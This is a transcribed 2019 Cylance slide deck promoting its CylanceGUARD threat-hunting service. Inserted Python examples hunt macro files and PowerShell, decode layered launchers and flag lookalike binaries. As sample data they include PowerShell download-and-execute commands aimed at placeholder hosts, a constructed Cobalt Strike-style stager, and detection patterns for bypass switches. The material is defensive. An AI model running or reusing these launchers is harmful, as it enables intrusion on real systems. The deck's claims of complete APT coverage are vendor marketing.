
Page 1

CylanceGUARD™ Threat Hunting Intelligence Briefing

Jason Bevis
VP, Global MDR, ThreatZERO™, & International Services

Dave Cundiff
Sr Director, CylanceGUARD

Page 2

Safe Harbor

The information in this presentation is confidential and proprietary to Cylance® and may not be disclosed without the permission of Cylance. This presentation is not subject to your license agreement or any other service or subscription agreement with Cylance. Cylance has no obligation to pursue any course of business outlined in this document or any related presentation, or to develop or release any functionality mentioned therein.

This document, or any related presentation and Cylance's strategy and possible future development, product, and/or platform direction and functionality are all subject to change and may be changed by Cylance at any time for any reason without notice. The information on this document is not a commitment, promise, or legal obligation to deliver any material, code, or functionality. This document is for informational purposes and may not be incorporated into a contract. Cylance assumes no responsibility for errors or omissions in this document.

Page 3

AGENDA

Intelligence and Methodology-based Processes: how MITRE ATT&CK is used to protect against multiple APTs

CylanceGUARD: MTTD (Mean Time to Discovery) and MTTR (Mean Time to Response)

What It Means for Your Teams: benefits of CylanceGUARD's unified threat hunting, detection, and response approach

Page 4

What is CylanceGUARD

▪ A 24x7 managed detection and response (MDR) offering
▪ Transparent portal interaction
▪ Mobile flexibility
▪ A solution to handle sophisticated and evolving attacks, alert fatigue, and our customers' skill or resource gaps
▪ A combination of several technologies and skilled resources that provides our customers a managed solution for prevention

Diagram: CylanceGUARD analysts and threat hunters.

Page 5

CylanceGUARD Components

Threat Validation and Triage; Mobile Warning and Interaction; Optics and Visibility:
▪ Analyzes and prioritizes
▪ Automates analyst and incident engagement
▪ Proactive alerting at the fingertips
▪ Context to streamline investigation
▪ Customer interaction with triage and response
▪ Skilled Cylance Hunting Experts
▪ Prevent zero-day threats

ThreatZERO:
▪ Prevention Expertise
▪ Prevent 99.9% of software-related threats

Diagram: CylanceGUARD portal (24x7 user interaction) with ThreatZERO, Triage, Mobile, and Hunting; cycle of Mobile Warning, Ongoing Prevention, and Validate & Triage.

Page 6

What is Needed

MOBILITY
▪ We are concerned busy security analysts won't see alerts due to the volume of email they receive.
▪ We don't expect our customers to sit glued to a monitor 24x7x365.
▪ Our customers don't have that kind of time.

VISIBILITY
Time is of the essence: the case where an alert is sent but no one responds has to be eliminated.

Diagram: Mobile Warning, Workflow, Visibility.

Page 7

CylanceGUARD Tier Comparison

Tiers: CylanceGUARD Standard, CylanceGUARD Advanced

Features compared across the two tiers:
▪ 24x7 Threat Hunting
▪ Email Alerts
▪ Mobile Alerts and Escalation Management
▪ Proactive Threat Hunting 24x7 (Alert, Intelligence, and Methodology Hunting)
▪ Proactive Outreach for Critical Alerts
▪ Quarterly Prevention Review (ongoing review with Cylance experts)
▪ CylanceGUARD Reports (monthly reports on activity and threat landscape)
▪ Access to GUARD Analysts (incident response guidance and strategy)
▪ ThreatZERO Configuration and Assurance (including Cylance product on-boarding)
▪ Defined SLAs for Critical Alerts

CylanceGUARD Standard provides a foundation. CylanceGUARD Advanced is a comprehensive solution that meets an organization's needs for threat hunting. Both offerings leverage the pre-execution abilities of CylancePROTECT and the post-execution monitoring and blocking associated with CylanceOPTICS.

Page 8

Threat Hunting Maturity

The SANS Institute uses the Hunting Maturity Model (originally defined by David Bianco while at Sqrrl), whose levels are:

LEVEL 0: INITIAL
▪ An organization relies primarily on automated reporting.
▪ Does little or no routine data collection.

LEVEL 1: MINIMAL
▪ An organization incorporates threat intelligence indicator searches.
▪ Has a moderate or high level of routine data collection.

LEVEL 2: PROCEDURAL
▪ An organization follows analysis procedures created by others.
▪ Has a high or very high level of routine data collection.

LEVEL 3: INNOVATIVE
▪ An organization creates new data analysis procedures.
▪ Has a high or very high level of routine data collection.

LEVEL 4: LEADING
▪ An organization automates the majority of successful data analysis procedures.
▪ Has a high or very high level of routine data collection.

Page 9

Threat Hunting Types

ALERT: Traditional Threat Management
Triggering events from products such as CylancePROTECT and CylanceOPTICS generate an alert that is followed up on by a CylanceGUARD analyst.

INTELLIGENCE: Internal and External Threat Data
The practice of gathering recent intelligence from multiple internal and external sources to identify new campaigns and trigger a manual or automated hunt.

METHODOLOGY: Process Based Hunting
CylanceOPTICS is leveraged to continually review and search across the environment. This is conducted using a standard methodology and backend analysis technology to hunt threats.

Page 10

Alert Based Hunting Framework

▪ CylancePROTECT® alerting (AI model, memdef, script control)
▪ 100 core CylanceOPTICS™ rules in the console
▪ 150+ custom rules used for CylanceGUARD and IR
▪ ATT&CK
▪ Contextual rules using ATT&CK TTPs and framework
▪ APT 3 and APT 29 use cases
▪ Prioritization of hunting and investigation

Page 11

Common Intelligence Hunting Sources

▪ Consulting on the ground: IOCs/TTPs from 2000+ IR engagements
▪ Threat Research: IOCs/TTPs
▪ Internal Research: CylanceGUARD
▪ Internal repository of good and bad software: VirusTotal / machine learning models
▪ Community-shared intel: blogs / Twitter / Git / communities
▪ Red team adversary simulation: APT 3 or APT 29 simulation / objectives

Page 12

GIT Repository Intelligence Example

Ex: OS = windows AND dir extension = :(docm|dotm|xlm|xltm|xla|pptm|potm|ppsm|sldm)
▪ Perform visualization stacking on the names
▪ Look for potentially malicious macro files based on low frequency

Ex: OS = windows AND type = eventspowershell AND script_block = (hidden AND bypass AND (nop OR noninteractive OR noprofile))

Process:
1. RESEARCH external intelligence GIT repositories
2. COLLECT artifacts from hosts
3. HUNT for hits across the customer based on new intelligence
4. PERFORM additional level of artifact collection
5. HUNT THROUGH DATA
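The two example queries above, as an added Python example that is not CylanceOPTICS query code or Cylance's own: it runs the macro-file stacking and the PowerShell script-block hunt over a constructed file inventory and constructed script-block events, then pivots on hosts that appear in both result sets. Host names, paths and script blocks are made up for this example; the switch abbreviations (-w, -ep, -nop, -noni) go beyond the slide's bare keyword query so that the short forms attackers usually type are caught as well.

```python
"""Hunts from the two example queries above, run over constructed endpoint data.
All hosts, paths and script blocks below are made up for this example."""
import ntpath
import re
from collections import defaultdict

# Macro-enabled Office extensions from the first query on the slide.
MACRO_EXTS = {"docm", "dotm", "xlm", "xltm", "xla", "pptm", "potm", "ppsm", "sldm"}

# Constructed file inventory: (host, os, path).
FILES = [
    ("host-01", "windows", r"C:\Users\alice\AppData\Roaming\Microsoft\Templates\Normal.dotm"),
    ("host-02", "windows", r"C:\Users\bob\AppData\Roaming\Microsoft\Templates\Normal.dotm"),
    ("host-03", "windows", r"C:\Users\carol\AppData\Roaming\Microsoft\Templates\Normal.dotm"),
    ("host-01", "windows", r"C:\Share\Finance\budget_template.xltm"),
    ("host-02", "windows", r"C:\Share\Finance\budget_template.xltm"),
    ("host-03", "windows", r"C:\Users\carol\Downloads\invoice_4471.docm"),
    ("host-02", "windows", r"C:\Users\bob\Documents\notes.docx"),   # not macro-enabled
    ("srv-01", "linux", "/home/deploy/invoice_4471.docm"),          # wrong OS, excluded by the query
]

# Constructed PowerShell script-block events: (host, script_block).
# The -EncodedCommand value is a placeholder, not a real payload.
PS_EVENTS = [
    ("host-03", "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAIACuAC4ALgA="),
    ("host-01", r"powershell -ExecutionPolicy Bypass -File C:\scripts\nightly_backup.ps1"),
    ("host-05", "powershell -WindowStyle Hidden -NoProfile -Command Get-Date"),
    ("host-02", "powershell -w hidden -ep bypass -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""),
]

# Second query on the slide: hidden AND bypass AND (nop OR noninteractive OR noprofile).
# The patterns also accept the short switch forms (-w, -ep, -noni) so abbreviated launchers hit.
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
BYPASS = re.compile(r"-e(?:xecutionpolicy|xec|p)?\s+bypass\b", re.I)
NOPROF = re.compile(r"-no(?:profile|ninteractive|ni|p)\b", re.I)


def stack_macro_files(files, max_hosts=1):
    """Stack macro-enabled file names (Windows hosts only) by distinct host
    count and return the rare ones: names present on at most max_hosts hosts."""
    hosts_by_name = defaultdict(set)
    for host, os_name, path in files:
        if os_name != "windows":
            continue
        name = ntpath.basename(path).lower()
        if "." in name and name.rsplit(".", 1)[1] in MACRO_EXTS:
            hosts_by_name[name].add(host)
    return sorted((name, sorted(hosts)) for name, hosts in hosts_by_name.items()
                  if len(hosts) <= max_hosts)


def hunt_powershell(events):
    """Return the (host, script_block) events that combine a hidden window,
    an execution-policy bypass and a no-profile / non-interactive switch."""
    return [(host, block) for host, block in events
            if HIDDEN.search(block) and BYPASS.search(block) and NOPROF.search(block)]


def hunt(files, events, max_hosts=1):
    """Run both hunts and pivot: hosts that carry a rare macro file AND ran a suspicious launcher."""
    rare = stack_macro_files(files, max_hosts)
    ps_hits = hunt_powershell(events)
    rare_hosts = {h for _, hosts in rare for h in hosts}
    ps_hosts = {h for h, _ in ps_hits}
    return {"rare_macro_files": rare, "powershell_hits": ps_hits,
            "hosts_with_both": sorted(rare_hosts & ps_hosts)}


if __name__ == "__main__":
    for key, value in hunt(FILES, PS_EVENTS).items():
        print(key, value)
```

Stacking counts distinct hosts rather than file occurrences, so a template copied a thousand times on one machine still stacks as one host; the pivot is where the "hunt through data" step starts, since a rare macro document on the same host as a hidden, policy-bypassing launcher is worth an analyst's time even when neither hit is conclusive alone.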

Page 13

Multiple Intel Sources

Diagram: Cobalt Strike PowerShell encoded command ($s=New-Obj…) wrapped in base64 layers.

1. Incident Response engagement
2. Optics rule for Cobalt Strike initially applied
3. Hit on the rule as the attacker tried to run their software
4. Results in a triple base64-encoded file with GZIP and compiled code
5. Threat Research does analysis of the files obtained
6. Results in new rules
7. Results in several additional customers in healthcare and other verticals identified as targeted

Page 14

Multiple Intel Source Mapping

Incident Response (custom compiled Python payload) feeds Threat Research. Results: identified similar activity in other customers.
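The triple-encoded launcher in steps 3 and 4, as an added Python example that is not Cylance's or Threat Research's code: it peels -EncodedCommand, FromBase64String and gzip layers in turn until plaintext remains, which is the first thing an analyst does with a hit like this before writing rules. The sample launcher is constructed inside the block in the Cobalt Strike stager shape the slide's "$s=New-Obj" label refers to, with an extra outer base64 wrapper to make three base64 layers; nothing in it is a real capture, and the URL uses a reserved example domain.

```python
"""Peel a nested PowerShell launcher (base64 / -EncodedCommand / gzip layers)
down to plaintext. The sample below is constructed, not a real capture."""
import base64
import gzip
import re

FROM_B64 = re.compile(r"FromBase64String\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")
ENC_CMD = re.compile(r"-(?:encodedcommand|enco|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
BARE_B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def _as_text(blob):
    """Decode one layer to text. -EncodedCommand carries UTF-16LE, which is
    recognised by its NUL bytes; anything else is tried as UTF-8."""
    if blob and blob.count(b"\x00") >= len(blob) // 3:
        try:
            return blob.decode("utf-16-le"), "utf-16le"
        except UnicodeDecodeError:
            return None, None
    try:
        return blob.decode("utf-8"), "utf-8"
    except UnicodeDecodeError:
        return None, None


def peel(blob, max_layers=12):
    """Strip gzip, FromBase64String(...), -EncodedCommand and bare base64
    layers until none applies. Returns (innermost_text, [layers in order])."""
    layers, text = [], None
    for _ in range(max_layers):
        if blob[:2] == b"\x1f\x8b":               # gzip magic
            blob = gzip.decompress(blob)
            layers.append("gzip")
            continue
        text, enc = _as_text(blob)
        if text is None:                          # binary we cannot decode
            break
        if enc == "utf-16le":
            layers.append("utf-16le")
        m = FROM_B64.search(text)
        if m:
            blob = base64.b64decode(m.group(1))
            layers.append("FromBase64String")
            continue
        m = ENC_CMD.search(text)
        if m:
            blob = base64.b64decode(m.group(1))
            layers.append("EncodedCommand")
            continue
        stripped = "".join(text.split())
        if len(stripped) >= 16 and BARE_B64.match(stripped):
            blob = base64.b64decode(stripped)
            layers.append("base64")
            continue
        break                                     # plaintext reached
    return text, layers


def indicators(text):
    """URLs found in the decoded stage, the first thing that becomes a rule or block."""
    return sorted(set(URL_RE.findall(text)))


def build_sample():
    """Constructed three-stage launcher in the Cobalt Strike stager shape."""
    stage0 = "IEX (New-Object Net.WebClient).DownloadString('http://beacon.example.invalid/a')"
    gz_b64 = base64.b64encode(gzip.compress(stage0.encode())).decode()
    stage1 = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
              'IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream('
              '$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();' % gz_b64)
    enc = base64.b64encode(stage1.encode("utf-16-le")).decode()      # what -EncodedCommand expects
    stage2 = "powershell -nop -w hidden -encodedcommand " + enc
    outer = base64.b64encode(stage2.encode()).decode()               # third base64 layer
    stage3 = 'IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("%s")))' % outer
    return stage3.encode()


if __name__ == "__main__":
    plain, layers = peel(build_sample())
    print(" -> ".join(layers))
    print(plain)
    print(indicators(plain))
```

The loop is deliberately ordered: gzip is checked by magic bytes before any text decoding, FromBase64String before -EncodedCommand (a stager usually contains both words only in the inner stage), and the bare-base64 fallback last, because short plaintext can look like base64. The layer list it returns is the part worth keeping next to the indicator, since the same wrapper sequence on another host is itself a detection.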

Page 15

Taking Methodology: MITRE ATT&CK Matrix

Working through the Exfiltration column of the matrix as a set of questions (each maps to an ATT&CK exfiltration technique such as Data Compressed, Data Encrypted, Data Transfer Size Limits, Exfiltration Over Alternative Protocol, and Scheduled Transfer):

1. What do we know?
2. How is data compressed?
3. How is data encrypted?
4. What is allowed out of this enterprise within a size limit that won't raise flags?
5. What protocols are allowed outbound?
6. What methods allow exfiltration within this organization?
7. Is there a scheduled transfer?

Page 16

More Exfil Methodology

Page 17

Methodology Package Deploy Analysis

Packages:
▪ APT32 Suspicious msmpeng
▪ Windows – Suspicious Files
▪ Common Threat Actor Staging Directories
▪ Damerau-Levenshtein Analysis
▪ EXE Stacking
▪ Large Files
▪ Macro Stacking
▪ Recent Files Stacking
▪ Suspicious System32
▪ TXT File Stacking
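A name-masquerading hunt in the spirit of the "Damerau-Levenshtein Analysis", "Suspicious System32" and "APT32 Suspicious msmpeng" packages, as an added Python example that is not Cylance's package code. The slide does not show what those packages check, so the two heuristics here are this example's own assumptions: a well-known binary name found in a directory it does not belong in, and a file name within one edit (insertion, deletion, substitution or adjacent transposition) of a well-known name. The expected-directory table and the sample paths are constructed for the example.

```python
"""Name-masquerading hunt over a constructed file listing (paths are not from
a real host). Uses the optimal-string-alignment form of Damerau-Levenshtein."""
import ntpath

# Well-known binaries and the directories they are expected in (assumed list;
# tune per environment, e.g. add WinSxS or the Defender platform directory).
EXPECTED_DIRS = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
    "csrss.exe": {r"c:\windows\system32"},
    "msmpeng.exe": {r"c:\program files\windows defender"},
}

# Constructed sample paths: two lookalike spellings, two out-of-place copies.
SAMPLE_PATHS = [
    r"C:\Windows\System32\svchost.exe",
    r"C:\Users\Public\svchost.exe",
    r"C:\ProgramData\scvhost.exe",
    r"C:\Windows\Temp\svch0st.exe",
    r"C:\Windows\System32\lsasss.exe",
    r"C:\Program Files\Windows Defender\MsMpEng.exe",
    r"C:\Users\bob\AppData\Roaming\MsMpEng.exe",
    r"C:\Users\alice\Documents\report.docx",
]


def osa_distance(a, b):
    """Optimal string alignment distance: Levenshtein plus adjacent
    transposition counted as one edit (each substring edited at most once)."""
    m, n = len(a), len(b)
    d = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m + 1):
        d[i][0] = i
    for j in range(n + 1):
        d[0][j] = j
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition
    return d[m][n]


def hunt_masquerades(paths, max_distance=1):
    """Return (path, reason, known_name) for each suspicious entry."""
    findings = []
    for path in paths:
        directory, name = ntpath.split(path.lower())
        if name in EXPECTED_DIRS:
            if directory not in EXPECTED_DIRS[name]:
                findings.append((path, "known_name_unexpected_dir", name))
            continue                      # exact name: skip the edit-distance pass
        for known in EXPECTED_DIRS:
            if 0 < osa_distance(name, known) <= max_distance:
                findings.append((path, "lookalike_name", known))
    return findings


if __name__ == "__main__":
    for finding in hunt_masquerades(SAMPLE_PATHS):
        print(finding)
```

A distance of 1 keeps the lookalike pass tight (svch0st, scvhost, lsasss); raising it to 2 widens coverage but starts matching legitimately similar names, so stack the results by host count first, the same way the EXE Stacking package does, before reviewing them.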

Page 18

Methodology: Looking at the Archives

Page 19

Attack Group Examples

APT29: Well organized and competent group. Classified in 2008 as an APT and believed to be Russian state sponsored.

APT28: Russian state sponsored group targeting political and military targets. Highly skilled at writing 0-day exploitation malware.

APT32: First mentioned publicly in 2010. Extremely adaptable, and persistent even when identified. Leverages a large assortment of legitimate software.

Page 20

APT29 Targeted Countries

North America: United States
Europe: Ireland, Belgium, Spain, Portugal, Czech Republic, Hungary, Luxembourg, Romania
Africa: Uganda
Asia Pacific: Azerbaijan, Georgia, Kazakhstan, Kyrgyzstan, Ukraine, Uzbekistan
South America: none yet identified
Middle East: Turkey

Page 21

APT29 Industries Targeted and Motives

▪ Russian state sponsored
▪ Cyber espionage and data exfiltration

Targets: Defense; Government Agencies; International Organizations

Page 22

APT29 Coverage

Leveraging CylancePROTECT and CylanceOPTICS provides CylanceGUARD with the ability to cover the totality of the APT29 techniques through a defense in depth approach. While these techniques are shown to be covered by individual protection mechanisms of the product, there is ample overlap in the coverage.

Chart: APT29 Coverage by Protection Type (Protect, Refract, CAE, No Coverage), percentage coverage per ATT&CK tactic: Collection, Command and Control, Credential Access, Defense Evasion, Discovery, Execution, Exfiltration, Initial Access, Lateral Movement, Persistence, Privilege Escalation.

Leveraging the full functionality of Cylance products provides complete coverage.

Page 23

APT28 Targeted Countries

North America: United States, Canada
Europe: Belarus, Belgium, Bulgaria, France, Germany, Hungary, Montenegro, Netherlands, Poland, Romania, Slovakia, Spain, Sweden, Switzerland, United Kingdom
Africa: none yet identified
Asia Pacific: Afghanistan, Armenia, China, Georgia, Japan, Kazakhstan, Latvia, Malaysia, Mongolia, South Korea, Tajikistan, Ukraine
South America: Brazil
Middle East: Iran, Turkey

Page 24

APT28 Industries Targeted and Motives

▪ Russian state sponsored
▪ Espionage and political manipulation

Targets: Aerospace; Cybersecurity; Defense; Embassies; Government; Hospitality; International Organizations; Media

Page 25

APT28 Coverage

Given APT28's proficiency at writing 0-day malware, a mathematical model with a high degree of maturity that assesses a significant number of dimensions, used in conjunction with a highly adaptable EDR, provides the best chance of success. Complete coverage of the techniques used by APT28 through defense in depth.

Chart: APT28 Coverage by Protection Type (Protect, Refract, CAE), percentage coverage per ATT&CK tactic: Collection, Command and Control, Credential Access, Defense Evasion, Discovery, Execution, Exfiltration, Initial Access, Lateral Movement, Persistence, Privilege Escalation.

Page 26

APT32 Targeted Countries

North America: United States
Europe: Germany
Africa: none yet identified
Asia Pacific: China, Australia, Philippines, Vietnam
South America: none yet identified
Middle East: none yet identified

Page 27

APT32 Industries Targeted and Motives

▪ Vietnam state sponsored
▪ Espionage

Targets: Administration; Communication; Financial Services; Government; High-Tech; International Organizations; Legal Services; Manufacturing; Media; Military; Naval

Page 28

APT32 Coverage

With APT32's ability to adapt and leverage a multitude of legitimate tools, the ability to cover endpoints with multiple layers of protection is almost required to combat this type of threat. Defense in depth coverage for a highly adaptable adversary.

Chart: APT32 Coverage by Protection Type (Protect, Refract, CAE), percentage coverage per ATT&CK tactic: Collection, Command and Control, Credential Access, Defense Evasion, Discovery, Execution, Exfiltration, Initial Access, Lateral Movement, Persistence, Privilege Escalation.

Page 29

CylanceGUARD Alert Workflow: Detection and Response

Page 30

Cylance Products Generate Event
Once CylancePROTECT and CylanceOPTICS are tuned according to CylanceGUARD requirements, the products generate events that are correlated and given context for analysts to triage and review.

Alert Initiated, Triage Begins
Initial triage of alerts begins within 90 minutes of alert generation for CylanceGUARD Advanced customers. This commitment is possible thanks to the filtering orchestration built into CylanceGUARD, which classifies events as triggers, observational, or whitelisted.

Response Sent, or Action Taken
Based upon the agreement between Cylance and the customer during onboarding, and depending on the type of events in an alert, Cylance analysts can perform actions within PROTECT and OPTICS on behalf of the customer or provide detailed response information for the customer to take action.

Page 31

Incident Response Initiated
If a critical alert requires incident response, the CylanceGUARD team will work with any chosen IR team, be that 3rd party, internal, or Cylance Consulting, to make the IR team more efficient and get you back to production ready as quickly as possible.

Alert Closed
The entire workflow can be followed from open to close within the CylanceGUARD console. Once all actions have been taken the alert is closed but preserved for later review.

Page 32

Benefits of CylanceGUARD

▪ Prevention First Approach
  ▪ Disrupts the kill chain
  ▪ MDR/EDR are reactive by nature
▪ Transparency of Activity
  ▪ Event reduction efficacy and visibility into the workflow
  ▪ Clear knowledge of MTTD (Mean Time to Discovery) and MTTR (Mean Time to Response)
  ▪ Mobile application security convenience
▪ Orchestration Capability
  ▪ Customer specific workflow
  ▪ Event reduction to focus on critical alerts
  ▪ Package deployment
▪ Advanced Threat Hunting
  ▪ Intelligence
  ▪ Methodology

Page 33

Questions & Answers

Page 34

© 2019 Cylance Inc. All Rights Reserved.